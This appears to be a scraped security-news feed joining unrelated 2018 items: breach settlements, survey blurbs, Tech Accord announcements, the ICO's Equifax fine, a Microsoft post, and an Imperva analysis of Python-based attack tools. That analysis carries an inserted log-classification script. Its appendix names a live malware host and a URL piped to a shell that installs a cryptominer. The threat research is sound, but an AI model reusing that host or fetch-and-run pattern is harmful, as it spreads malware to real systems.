Cybersecurity researchers at ESET have unveiled what they claim to be the first-ever UEFI rootkit being used in the wild, allowing hackers to implant persistent malware on the targeted computers that could survive a complete hard-drive wipe. Dubbed LoJax, the UEFI rootkit is part of a malware campaign conducted by the infamous Sednit group, also known as APT28, Fancy Bear, Strontium, and

Uber Settles with 50 State Attorneys General for $148 Million In Connection with 2016 Data Breach

On September 26, 2018, Uber Technologies Inc. (“Uber”) agreed to a settlement (the “Settlement”) with all 50 U.S. state attorneys general (the “Attorneys General”) in connection with a 2016 data breach affecting the personal information (including driver’s license numbers) of approximately 607,000 Uber drivers nationwide, as well as approximately 57 million consumers’ email addresses and phone numbers. The Attorneys General alleged that after Uber learned of the breach, which occurred in November 2016, the company paid intruders a $100,000 ransom to delete the data. The Attorneys General alleged that Uber failed to promptly notify affected individuals of the incident, as required under various state laws, instead notifying affected customers and drivers of the breach one year later in November 2017. 

As reported by the Pennsylvania Office of the Attorney General, the Settlement will require Uber to pay $148 million to the Attorneys General, which will be divided among the 50 states. In addition, Uber must undertake certain data security measures, including:

  • comply with applicable breach notification and consumer protection laws regarding protecting personal information;
  • implement measures to protect user data stored on third-party platforms;
  • implement stricter internal password policies for employee access to Uber’s network;
  • develop and implement an overall data security policy to address the collection and protection of personal information, including assessing potential data security risks;
  • implement additional data security measures with respect to personal information stored on Uber’s network;
  • implement a corporate integrity program to ensure appropriate reporting channels for internal ethics concerns or complaints; and
  • engage a third-party expert to conduct regular assessments of Uber’s data security efforts and make recommendations for improvement, as appropriate.

The Settlement is pending court approval. In a statement, California Attorney General Xavier Becerra said, “Uber’s decision to cover up this breach was a blatant violation of the public’s trust. The company failed to safeguard user data and notify authorities when it was exposed. Consistent with its corporate culture at the time, Uber swept the breach under the rug in deliberate disregard of the law.”

We previously reported that the Federal Trade Commission modified a 2017 settlement with Uber after learning of the company’s response to the 2016 breach.

The state of network security in organizations with 1000+ employees

Security team size at the largest organizations does not scale with the number of overall employees, but such teams are more likely to include staff with specialized roles, say the results of the latest survey conducted by Osterman Research in partnership with ProtectWise.

The similarities

They interviewed 400 security analysts in the US to uncover the state of network security across mid-size and large organizations, and found that despite a number of differences, mid-sized … More

The post The state of network security in organizations with 1000+ employees appeared first on Help Net Security.

You should prepare for the next mega data breach

As of September 2018, it’s been one year since the historic Equifax mega data breach that impacted nearly half of all consumers in the U.S. Since this monumental invasion of personal data, fraudsters have shown little to no sign of slowing down, as evidenced by the continued emergence of additional data breaches. In fact, within the past year alone, nearly 30 percent of U.S. consumers have been notified of a breach impacting their own personal … More

The post You should prepare for the next mega data breach appeared first on Help Net Security.

Downloads of known vulnerable open source components increase 120%

Sonatype today released its fourth annual State of the Software Supply Chain Report, which reveals the widespread use of vulnerable software components by businesses around the world. While open source continues to be a key driver of innovation – with software developers downloading more than 300 billion open source components in the past 12 months – hackers are exploiting this growing trend, and even beginning to inject vulnerabilities directly into open source projects. The findings … More

The post Downloads of known vulnerable open source components increase 120% appeared first on Help Net Security.

Most enterprises now running Windows 10, security hygiene no longer optional

Security is galvanizing around the move to Windows 10, the operating system that the majority of companies now run in their organizations, according to the 2018 Enterprise Endpoint Security Survey by Adaptiva. In the survey, over half of respondents indicated that security hygiene is a priority, listing security configuration management as an action that must be performed every day at a minimum. However, staffing remains a huge obstacle as less than half feel their organization … More

The post Most enterprises now running Windows 10, security hygiene no longer optional appeared first on Help Net Security.

The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice

Python will soon be the world’s most prevalent coding language.

That’s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it’s not hard to see why The Economist recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors.

And the best place to do that is, well, GitHub, of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool / exploit PoC are written in Python. In virtually every security-related topic on GitHub, the majority of the repositories are written in Python, including tools such as w3af, Sqlmap, and even the infamous AutoSploit tool.

At Imperva, we use an advanced intelligent Client Classification mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the majority of the clients (>25%) we identify — excluding vulnerability scanners — are based on Python.

Unlike other clients, in Python, we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python’s advantages which makes it a popular hacking tool.

Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.

When examining the use of Python in attacks against sites we protect, the result was unsurprising – a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning.  

Figure 2: Daily percentage of sites suffering Python-based attacks

Python Modules

The two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution.  Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of layer 7 DDoS; especially when using a “Spray N’ Pray” technique:
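As an added example (not Imperva's code, and not their Client Classification mechanism), the following Python script classifies web clients by the default User-Agent strings of the three libraries named above (urllib, Requests, aiohttp) and computes, from constructed access-log lines, the per-day share of sites that saw Python-based requests, the metric behind Figure 2, along with the share of sites where Python tools were the majority client. The log layout, site names, sample lines and the majority rule are assumptions.

```python
"""Added example, not Imperva's code: classify web clients from the default
User-Agent strings of the Python HTTP libraries the post names (urllib,
Requests, aiohttp) and compute, per day, the share of sites that saw any
Python-based request and the share where Python tools were the majority
client. The log layout (virtual host + combined log format), site names
and sample lines are constructed for the example."""

from __future__ import annotations

import re
from collections import defaultdict
from typing import Optional

# One request per line: <site> <ip> - - [<ts>] "<request>" <status> <size> "<referer>" "<ua>"
LOG_RE = re.compile(
    r'^(?P<site>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Default User-Agent prefixes each library sends unless the caller overrides them.
UA_FAMILIES = [
    ("python-requests", re.compile(r"^python-requests/")),
    ("python-urllib",   re.compile(r"^Python-urllib/")),
    ("python-aiohttp",  re.compile(r"^Python/\S+ aiohttp/")),
    ("curl",            re.compile(r"^curl/")),
]


def classify_client(ua: str) -> str:
    """Coarse client family from the User-Agent header.

    Caveat: the header is client-controlled. A Python tool that sets a
    browser-like User-Agent is classified as "browser" here, which is why
    the post's recommendation does not depend on telling the two apart.
    """
    for family, rx in UA_FAMILIES:
        if rx.search(ua):
            return family
    return "browser" if ua.startswith("Mozilla/") else "other"


def parse_line(line: str) -> Optional[dict]:
    """Fields of one log line plus its day and client family; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["day"] = rec["ts"].split(":", 1)[0]        # "28/Aug/2018"
    rec["family"] = classify_client(rec["ua"])
    return rec


def daily_site_stats(lines: list[str]) -> dict:
    """Per day: sites seen, sites with at least one Python-based request, and
    sites where Python-based requests outnumber all other clients combined."""
    counts = defaultdict(lambda: [0, 0])           # (day, site) -> [python, total]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                               # skip malformed lines
        c = counts[(rec["day"], rec["site"])]
        c[1] += 1
        if rec["family"].startswith("python-"):
            c[0] += 1
    stats = defaultdict(lambda: {"sites": 0, "sites_with_python": 0, "sites_python_majority": 0})
    for (day, _site), (py, total) in counts.items():
        s = stats[day]
        s["sites"] += 1
        s["sites_with_python"] += int(py > 0)
        s["sites_python_majority"] += int(py * 2 > total)
    return dict(stats)


def python_site_percentage(stats: dict) -> dict:
    """The Figure 2 metric: percentage of sites per day that saw Python-based requests."""
    return {day: round(100.0 * s["sites_with_python"] / s["sites"], 1)
            for day, s in stats.items()}


# Constructed log lines (RFC 5737 documentation addresses, invented hosts).
BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SAMPLE_LOG = [
    f'shop.example 203.0.113.5 - - [28/Aug/2018:10:15:32 +0000] "POST /index.php HTTP/1.1" 403 512 "-" "python-requests/2.19.1"',
    f'shop.example 203.0.113.5 - - [28/Aug/2018:10:15:33 +0000] "GET /wp-login.php HTTP/1.1" 403 512 "-" "python-requests/2.19.1"',
    f'shop.example 198.51.100.7 - - [28/Aug/2018:10:20:01 +0000] "GET / HTTP/1.1" 200 8192 "-" "{BROWSER}"',
    f'blog.example 198.51.100.8 - - [28/Aug/2018:11:02:10 +0000] "GET /about HTTP/1.1" 200 4096 "-" "{BROWSER}"',
    f'blog.example 198.51.100.9 - - [28/Aug/2018:11:05:44 +0000] "GET /feed HTTP/1.1" 200 2048 "-" "curl/7.61.0"',
    f'api.example 203.0.113.6 - - [28/Aug/2018:12:00:00 +0000] "GET /v1/users HTTP/1.1" 401 128 "-" "Python-urllib/3.6"',
    f'api.example 203.0.113.7 - - [28/Aug/2018:12:00:05 +0000] "GET /v1/users HTTP/1.1" 401 128 "-" "Python/3.6 aiohttp/3.3.2"',
    f'api.example 198.51.100.10 - - [28/Aug/2018:12:30:00 +0000] "GET /v1/status HTTP/1.1" 200 64 "-" "{BROWSER}"',
    f'shop.example 198.51.100.7 - - [29/Aug/2018:09:00:00 +0000] "GET / HTTP/1.1" 200 8192 "-" "{BROWSER}"',
    f'blog.example 203.0.113.5 - - [29/Aug/2018:09:10:00 +0000] "GET /xmlrpc.php HTTP/1.1" 403 512 "-" "python-requests/2.19.1"',
    f'blog.example 198.51.100.8 - - [29/Aug/2018:09:11:00 +0000] "GET / HTTP/1.1" 200 4096 "-" "{BROWSER}"',
    f'blog.example 198.51.100.11 - - [29/Aug/2018:09:12:00 +0000] "GET /about HTTP/1.1" 200 4096 "-" "{BROWSER}"',
]

if __name__ == "__main__":
    stats = daily_site_stats(SAMPLE_LOG)
    for day, pct in python_site_percentage(stats).items():
        print(day, stats[day], f"{pct}% of sites saw Python-based requests")
```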

Python and Known Exploits

The advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don’t expect it to stop.

The two most popular attacks in the last 2 months used CVE-2017-9841 – a PHP-based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562, which is an RCE against the Joomla! framework. It isn’t surprising that the most common attacks had RCE potential, considering how valuable it is to malicious actors.

Another example, which isn’t in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.

CVEs over time

You can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years:

In addition, Python is used to target specific applications and frameworks – below you can find the top 10, according to our data:

When we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently some of the most popular frameworks out there.

Attack vectors

The most popular HTTP parameter value we’ve seen used in attacks, responsible for around 30% of all different param values used, belongs to a backdoor upload attempt through a PHP Unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The backdoor uploaded payload is hosted on ICG-AuthExploiterBot.

We’ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix — note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.

Our recommendation

Unless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same – make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.

Appendix – Example of an Attack

Here’s an interesting, recurring payload we’ve observed (with a small variance at the end):

After base64 decoding it, we get a binary payload:

In the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://45.227.252.250/jre.jpg we can see that it’s actually a script containing the following:

The last two lines in the script try to fetch http://45.227.252.250/static/font.jpg%7Csh, which is identified as Trojan.Coinbitminer by Symantec Endpoint Protection.

This finding relates to a tweet from the end of August 2018, talking about a new Apache Struts vulnerability CVE-2018-11776 used to infect with the same Coinbitminer.

New tactics subvert traditional security measures and strike organizations of all sizes

Alert Logic released its latest cybersecurity analysis, “Critical Watch Report: The State of Threat Detection 2018,” which shows attackers are gaining vastly greater scale through new techniques such as killchain compression and attack automation, expanding the range of organizations under constant attack regardless of industry or size. To prepare the cybersecurity report, Alert Logic Security Operations and Threat Intelligence team members analyzed data from more than 1.2 billion anomalies, 7.2 million security events, and 250,000 … More

The post New tactics subvert traditional security measures and strike organizations of all sizes appeared first on Help Net Security.

Full compliance with the PCI DSS drops for the first time in six years

After documenting improvements in Payment Card Industry Data Security Standard (PCI DSS) compliance over the past six years (2010 – 2016), Verizon’s 2018 Payment Security Report (PSR) now reveals a concerning downward trend, with companies failing compliance assessments and, perhaps more importantly, not maintaining full compliance.

Full compliance at interim assessment by year

The PCI DSS helps businesses that offer card payment facilities protect their payment systems from breaches and theft of cardholder data. … More

The post Full compliance with the PCI DSS drops for the first time in six years appeared first on Help Net Security.

Poor security behavior still evident in most industry sectors

Security behaviors are poor across most industry sectors in Europe and the United States regardless of employees’ attitudes towards security. In the largest study on security culture to date, the Norwegian software company CLTRe AS reveals data from more than 20,000 employees, across seven languages.

Security Culture Report 2018 key findings

Poor security behavior is evident in most industry sectors. The real estate sector is consistently worse in cybersecurity culture than any other sector … More

The post Poor security behavior still evident in most industry sectors appeared first on Help Net Security.

Panda Security has signed the Cybersecurity Tech Accord

Panda Security signs the Cybersecurity Tech Accord
The Spanish multinational is joining a key accord among a group of leading companies from around the world in the interest of defending equitable, global cybersecurity, an accord that over 60 leading technology and security companies have already joined.

Protecting our digital world is in the interest of everyone. With this in mind, Panda Security announces that it is joining the Cybersecurity Tech Accord and its public commitment to act responsibly, protect, and empower users and clients, and in this way improve the security, stability, and the resilience of cyberspace.

Three months after the announcement of the creation of the Cybersecurity Tech Accord, there are already 61 companies from all over the world that have joined in order to defend users against malicious attacks. Panda Security is among the renowned organizations who have joined in the last few hours, along with Aliter, Anomali, Balasys, Billennium, Cognizant, Cyber Services, Hitachi, Imperva, Integrity Partners, Panasonic, Predica, Rockwell Automation, Safetica, SecuCloud, Swisscom and Telelink. All of them join an expanding community of like-minded companies that aim to improve the resilience of cyberspace against malicious activities, and that, as a group, reaffirm their commitment to empowering users, developers, and clients so that they can better protect themselves.

Called for by Microsoft, the accord establishes a scope for collaboration, and creates mechanisms for the periodic exchange of information related to incidents or other important aspects related to cybersecurity; it calls for the sharing of methodologies to improve IT security; sharing of knowledge in this area, and support for the training and education of users, professionals, and companies in this area.

“The main commitment of Panda Security is to allowing people and organizations to enjoy technology safely, and without risks. Safeguarding our clients’ digital lives using high performance, secure, efficient systems, that are capable of fighting any kind of threat,” states Juan Santamaría, Panda Security’s CEO. “Cybersecurity is a challenge that we must face in a coordinated way, and it is precisely for this reason that we have made official our commitment via this collaboration agreement,” he adds.

As well as a first-rate relationship and coordination among the signatories, the Cybersecurity Tech Accord works to defend and promote digital technologies in society and to supervise important aspects of the world’s communications infrastructure, including cloud-based client relationships, collaboration tools, and endpoint, data center, and encryption security: the principles of protection for everyone.

Every company that is a signatory of the Cybersecurity Tech Accord is committed to four areas:

Greater defense against cyberattacks

As part of this, recognizing that everyone deserves protection, the participants commit to protect all clients all over the world, independently of the motivation for the online attacks.

Protecting citizens and companies

The companies will not help governments to launch cyberattacks against innocent citizens or businesses, and will protect them against tampering with and exploitation of technology products and services during their development, design, distribution and use.

A scene of collaboration

The companies will do more to empower developers and the people and companies that use their technology, helping them to improve their capacity to protect themselves. This can include working together on new security practices and new features that the companies can implement in their individual products and services.

Collective action

The companies will build on existing relationships, and will establish formal and informal partnerships with industry, civil society, and security researchers, across proprietary and open source technologies to improve technical collaboration, coordinated vulnerability disclosure, and threat sharing, as well as to minimize the levels of malicious code being introduced into cyberspace.

Proof of this firm commitment to collective action can be seen in the recent support of MANRS, an association whose aim is to guarantee secure and resilient Internet access via the protection of routing infrastructure, or in the recent association with the Global Forum on Cyber Expertise, a global platform for countries, international organizations and private companies to exchange best practices and expertise on cyber capacity building, while maintaining the values of a free, open and secure Internet.

The accord is open to new signatories, independently of their sector or size, provided that they are trusted, already have high cybersecurity standards, adhere to the principles of the accord, and are approved beforehand by the other members of the accord.

Efforts aimed at protecting users independently of where they are from, or their geopolitical situation.

The post Panda Security has signed the Cybersecurity Tech Accord appeared first on Panda Security Mediacenter.

Why security products should be more actionable for users

As an active angel investor in companies that want to bring new security technology into the market, Azi Cohen is most likely to be persuaded to invest by three things: an endorsement from an external CISO, a clear go-to-market plan, and a team that knows how to sell security solutions. He also believes that all security companies – whether they are just starting or are already entrenched – should strive to make their products more … More

The post Why security products should be more actionable for users appeared first on Help Net Security.

Are you ready? A good incident response plan can protect your organization

The rise in cyber threats in the last several years has shown that organizations must continuously stay ahead of adversaries to protect their investments: data, intellectual property, finances, and people. Indeed, the Cisco 2018 Annual Cybersecurity Report found that the cost of attacks is no longer hypothetical. More than half of all breaches resulted in financial damages of more than $500,000. Over the years, I’ve designed incident response teams from the ground up as well … More

The post Are you ready? A good incident response plan can protect your organization appeared first on Help Net Security.

BlockState Interview Part One: Institutional Investment Framework Story

The mainstream media narrative has shown an uncompromisingly negative bias towards institutional crypto investment of late and it only seemed fair that we got in touch with some people who have professional expertise in the field. BlockState is a platform that aims to deliver a modular blockchain-based legal and technological infrastructure for financial institutions which […]

The post BlockState Interview Part One: Institutional Investment Framework Story appeared first on Hacked: Hacking Finance.

Imperva Joins Global Cybersecurity Tech Accord

Imperva is dedicated to the global fight to keep people’s data and applications safe from cybercriminals. What this means for our Imperva Threat Research team is that we spend a lot of time researching new cyber attacks, creating mitigations and writing powerful software. We believe that nothing grows in a vacuum, and as such understand the importance of collaboration as a member of the global cybersecurity ecosystem.

To this end, when we heard about the Cybersecurity Tech Accord, we knew it provided a unique opportunity for us to not only continue protecting our customers but to help make “cyberspace” safer for everyone. We’ve committed to working hand-in-hand with 61 other global companies, in doing so improving the security, stability, and resilience of cyberspace.

About the Cybersecurity Tech Accord

The Cybersecurity Tech Accord is a public commitment among 61 global companies to protect and empower the global online community and to improve the security, stability, and resilience of cyberspace.

Our Tech Accord commitment:

  • We will protect all of our users and customers everywhere. For us at Imperva, that’s part of our DNA. That means prioritizing security, integrity, and reliability of our software, to decrease the likelihood, frequency, exploitability, and severity of vulnerabilities.
  • We will oppose cyberattacks on innocent citizens and enterprises from anywhere. That means that we will not help governments launch cyber attacks on innocent citizens and enterprises from anywhere.

    It also means that we will protect against tampering with and exploitation of technology products and services during their development, design, distribution, and use.
  • We will help empower users, customers and developers to strengthen cybersecurity protection. That means we will provide our users, customers and the wider developer ecosystem with information and tools that enable them to understand current and future threats and protect themselves against them.

    It also means that we will support civil society, governments, and international organizations in their efforts to advance security in cyberspace and to build cybersecurity capacity in developed and emerging economies alike.
  • We will partner with each other and with like-minded groups to enhance cybersecurity. We feel like this is the heart of the Cybersecurity collaboration, the commitment to first fight cyber-crime and cyber-terrorism, only then be business rivals.

    It means we will work with each other and will establish formal and informal partnerships with industry, civil society, and security researchers, across proprietary and open source technologies, to improve technical collaboration, coordinated vulnerability disclosure, and threat sharing, as well as to minimize the levels of malicious code being introduced into cyberspace.

    It also means we will encourage global information sharing and civilian efforts to identify, prevent, detect, respond to, and recover from cyber attacks and ensure flexible responses to the security of the wider global technology ecosystem.

We are excited about being a part of the Cybersecurity Tech Accord and look forward to collaborating with fellow members.

One of our first collaborations will be a webinar for the Global Forum on Cyber Expertise (GFCE).

About the Global Forum on Cyber Expertise (GFCE)

The Global Forum on Cyber Expertise (GFCE) is a global platform for countries, international organizations and private companies to exchange best practices and expertise on cyber capacity building. The aim is to identify successful policies, practices, and ideas and multiply these on a global level. Together with partners from NGOs, the tech community and academia GFCE members develop practical initiatives to build cyber capacity.

Our webinar with the GFCE will be on application security. As you can imagine, this is a topic we are very passionate about – so we hope you’ll join us.

UK ICO Fines Equifax for 2017 Breach

Recently, the UK Information Commissioner’s Office (“ICO”) fined credit rating agency Equifax £500,000 for failing to protect the personal data of up to 15 million UK individuals. The data was compromised during a cyber attack that occurred between May 13 and July 30, 2017, which affected 146 million customers globally. Although Equifax’s systems in the U.S. were targeted, the ICO found the credit agency’s UK arm, Equifax Ltd, failed to take appropriate steps to ensure that its parent firm, which processed this data on its behalf, had protected the information. The ICO investigation uncovered a number of serious contraventions of the UK Data Protection Act 1998 (the “DPA”), resulting in the ICO imposing on Equifax Ltd the maximum fine available.

The compromised UK data was controlled by Equifax Ltd and was processed by Equifax Ltd’s parent company and data processor, Equifax Inc. The breach affected Equifax’s Identity Verifier (“EIV”) dataset, which related to the EIV product, and its GCS dataset. The compromised data included names, telephone numbers, driver’s licence numbers, financial details, dates of birth, security questions and answers (in plain text), passwords (in plain text) and credit card numbers (obscured). The ICO investigation found that there had been breaches of five of the eight data protection principles of the DPA. In particular, the ICO commented in detail on Equifax’s breaches of the fifth and seventh principles and noted the following:

  • Personal data processed for any purpose or purposes shall not be kept for longer than is necessary for that purpose or those purposes (Fifth Principle):
    • In 2016, Equifax Ltd moved the EIV product from the U.S. to be hosted in the UK. Once the EIV product had been migrated to the UK, it was no longer necessary to keep any of the EIV dataset, in particular the compromised UK data, on Equifax Inc.’s systems. The EIV dataset, however, was not deleted from Equifax’s U.S. systems and was subsequently compromised.
    • With respect to the GCS datasets stored on the U.S. system, Equifax Ltd was not sufficiently aware of the purpose(s) for which they were being processed until after the breach. In the absence of a lawful basis for processing (in breach of the First Principle of the DPA), the personal data should have been deleted. The data was not deleted, and Equifax Ltd failed to follow up or check that all UK data had been removed from Equifax’s U.S. systems.
  • Appropriate technical and organizational measures shall be taken against unauthorized or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data (Seventh Principle):
    • Equifax Ltd failed to undertake an adequate risk assessment of the security arrangements that Equifax Inc. had in place, prior to transferring data to Equifax Inc. or following the transfer.
    • Equifax Ltd and Equifax Inc. had various data processing agreements in place, however, these agreements failed to (1) provide appropriate safeguards (not limited to security requirements), and (2) properly incorporate the EU Standard Contractual Clauses (in breach of the Eighth Principle of the DPA).
    • Equifax Ltd had a clear contractual right to audit Equifax Inc.’s compliance with its obligations under the aforementioned data processing agreements. Despite this right, Equifax Ltd failed to exercise it to check Equifax Inc.’s compliance with its obligations.
    • Communication procedures between Equifax Ltd and Equifax Inc. were deemed inadequate. In particular, this was highlighted by the delay of over one month between Equifax Inc. becoming aware of the breach and Equifax Ltd being informed of it.
    • Equifax Ltd failed to ensure adequate security measures were in place or notice that Equifax Inc. had failed to take such measures, including:
      • failing to adequately encrypt personal data or protect user passwords. The ICO did not accept Equifax Ltd’s reasons (i.e., fraud prevention and password analysis) for storing passwords in a plaintext file, particularly as it was a direct breach of Equifax Ltd’s own Cryptology Standards, and the stated aims could be achieved by other more secure means;
      • failing to address known IT vulnerabilities, including those identified and reported to senior employees. In particular, Equifax had been warned about a critical vulnerability in its systems by the U.S. Department of Homeland Security in March 2017. This vulnerability was given a score of 10.0 on the Common Vulnerability Scoring System (“CVSS”). A CVSS score of 10.0 is the highest score, indicating a critical vulnerability that requires immediate attention. Equifax Inc. failed to patch all vulnerable systems and this vulnerability in its consumer-facing disputes portal was exploited by the cyber attack; and
      • not having fully up-to-date software, failing to undertake sufficient and regular system scans, and failing to ensure appropriate network segregation (some UK data was stored together with U.S. data, making it difficult to differentiate).

Since the breach occurred prior to May 25, 2018, it was dealt with in accordance with the DPA. While the Equifax fine represents the maximum available under the DPA, given the aggravating factors identified by the ICO (the number of affected data subjects, the type of data at risk, and the multiple, systematic and serious inadequacies), it is likely that this fine would have been considerably higher had the EU General Data Protection Regulation been in force when the breach occurred.

Delivering security innovation that puts Microsoft’s experience to work for you

Cybersecurity is the central challenge of our digital age. Without it, everything from our personal email accounts and privacy to the way we do business, and all types of critical infrastructure, are under threat. As attackers evolve, staying ahead of these threats is getting harder.

Microsoft can help. We focus on three areas: running security operations that work for you, building enterprise-class technology, and driving partnerships for a heterogeneous world. We can tip the scales in favor of the good guys and make the world a safer place.

Security operations that work for you

Every day, we practice security operations at a global scale to protect our customers, in the process analyzing more than 6.5 trillion signals. This is the most recent chapter in a journey down the experience curve that we have been on for more than a decade. Beginning with securing the operating system platform, our Microsoft Threat Intelligence Center (MSTIC) learned to build multi-dimensional telemetry to support security use cases, and to spot that rogue exploit in a distant crash dump bucket. Today, more than 3,500 full-time security professionals work to secure datacenters, run our Cyber Defense Operations Center, hack our own defenses, and hunt down attackers. We block more than 5 billion distinct malware threats per month. Just one recent example shows the power of the cloud: Microsoft's cloud-based machine learning models detected a stealthy and highly targeted Ursnif attack on small businesses across the U.S., with only 200 discrete targets, and neutralized the threat. We surface this operational experience and the insights we derive from it in the security technology we build.

Building enterprise-class technology

It is the cloud that enables us to take all this signal, intelligence, and operational experience and use it to help our customers be more secure, with enterprise-class security technology. For example, we use the insights from processing hundreds of billions of authentications to cloud services a month to deliver risk-based conditional access for customers in Azure Active Directory (AD).

The end of the password era

We are not only protecting the Microsoft platform though. Our security helps protect hundreds of thousands of line-of-business and SaaS apps as they connect to Azure AD. We are delivering new support for password-less sign-in to Azure AD-connected apps via Microsoft Authenticator. The Authenticator app replaces your password with a more secure multi-factor sign-in that combines your phone and your fingerprint, face, or PIN. Using a multi-factor sign-in method, you can reduce compromise by 99.9 percent, and you can make the user experience simpler by eliminating passwords. No company lets enterprises eliminate more passwords than Microsoft. Today, we are declaring an end to the era of passwords.

Improving your security posture with a report card

Microsoft Secure Score is the only enterprise-class dynamic report card for cybersecurity. By using it, organizations get assessments and recommendations that typically reduce their chance of a breach by 30-fold. It guides you to take steps like securing admin accounts with Multi-Factor Authentication (MFA), securing user accounts with MFA, and turning off client-side email forwarding rules. Starting today, we're expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for your hybrid cloud workloads in the Azure Security Center, so you have full visibility across your estate.

Putting cloud intelligence in your hands with Microsoft Threat Protection

By connecting our cloud intelligence to our threat protection solutions, we can stem a mass outbreak or find a needle in a haystack. A recent highly localized malware campaign, for example, targeted just under 200 home users and small businesses in a few U.S. cities. It was designed to fly under the radar, but Windows Defender's cloud-based machine learning models detected the malicious behavior and stopped it cold.

To help security operations professionals benefit from our experience, we created a community where our researchers and others from the industry can share advanced queries to hunt attackers and new threats, giving us all more insight and better protection.

Today, we're announcing Microsoft Threat Protection, an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure in the Microsoft 365 admin console. This will let analysts save thousands of hours as they automate the more mundane security tasks.

Protecting data wherever it goes

Cloud workloads are often targeted by cybercriminals because they operate on some of the most sensitive data an organization has. We made Azure the first cloud platform to offer confidentiality and integrity of data while in use, adding to the protections already in place to encrypt data in transit and at rest. Azure confidential computing benefits will be available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while it is computed on.

Sensitive data isn't only in databases and cloud workloads. A huge amount of the information we share in email and documents is private or sensitive too. To effectively protect your most important data, you need intelligent solutions that enable you to automatically discover, classify, label, protect, and monitor it, no matter where it lives or travels. The Microsoft Information Protection solutions we announced last year help to do just that. Today, we are rolling out a unified labeling experience in the Security & Compliance center, which gives you a single, integrated approach to creating data sensitivity and data retention labels. We are also previewing labeling capabilities that are built right into Office apps across all major platforms, and extending labeling and protection capabilities to include PDF documents. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build their own applications that understand, apply, and act on Microsoft's sensitivity labels.

Driving partnerships for a heterogeneous world

To address a challenge as big as cybersecurity, we do more than only drive technological innovation. We invest in a broad set of technology and policy partnership initiatives.

We work across the industry to advance the state of the art and to lead on standards through organizations like the FIDO alliance, and to tackle emerging new ecosystem challenges like security for MCU-powered devices with innovations such as Azure Sphere, now available for preview.

We also work with our fellow security vendors to integrate the variety of security tools that our mutual customers use through our Microsoft Intelligent Security Association. Specifically, the Microsoft Graph Security API, generally available starting today, helps our partners work with us and each other to give you better threat detection and faster incident response. It connects a broad heterogeneous ecosystem of security solutions via a standard interface to help integrate security alerts, unlock contextual information, and simplify security automation.

Microsoft is working with tech companies, policymakers, and institutions critical to the democratic process on strategies to protect our midterm elections. The Defending Democracy program is working to protect political campaigns from hacking, increase security of the electoral process, defend against disinformation, and bring greater transparency to political advertising online. Part of this program is the AccountGuard initiative that provides state-of-the-art cybersecurity protection at no extra cost to all candidates and campaign offices at the federal, state, and local level, as well as think tanks and political organizations. We've had strong interest in AccountGuard and in the first month onboarded more than 30 organizations. We've focused on onboarding large national party operations first and have successfully done so for committees representing both major U.S. parties as well as high profile campaigns and think tanks, and we are working to onboard additional groups each week. Microsoft is developing plans to extend our Defending Democracy program to democracies around the world.

Since participating in the establishment of the Cybersecurity Tech Accord, an agreement to defend all customers everywhere from malicious attacks by cybercriminal enterprises and nation states, we have seen that group nearly double in size with 27 new organizations joining from around the globe, including Panasonic, Salesforce, Swisscom, and Rockwell Automation to name a few, bringing total signatories to 61. Our Digital Crimes Unit has worked with global law enforcement agencies to bring criminals to justice: to date, taking down 18 criminal bot-nets and rescuing nearly 500 million devices from secret bot-net control. In partnership with security teams across the company, the Digital Crimes Unit has also combatted nation-state hackers, using innovative legal approaches 12 times in two years to shut down 84 fake websites, often used in phishing attacks and set up by a group known as Strontium that is widely associated with the Russian government.

Our unique leadership and unmatched breadth of impact in security comes with a unique responsibility to make the world a safer place. We embrace it, and I am optimistic about what we can do. Together with our customers, we are turning the tide in cybersecurity.

I'll be talking about these announcements and more today in my session at Ignite. If you're not in Orlando, you can live stream it. To learn more about Microsoft's security offerings, visit Microsoft.com/security.

The post Delivering security innovation that puts Microsoft’s experience to work for you appeared first on Microsoft Secure.

What do you mean by storage encryption?

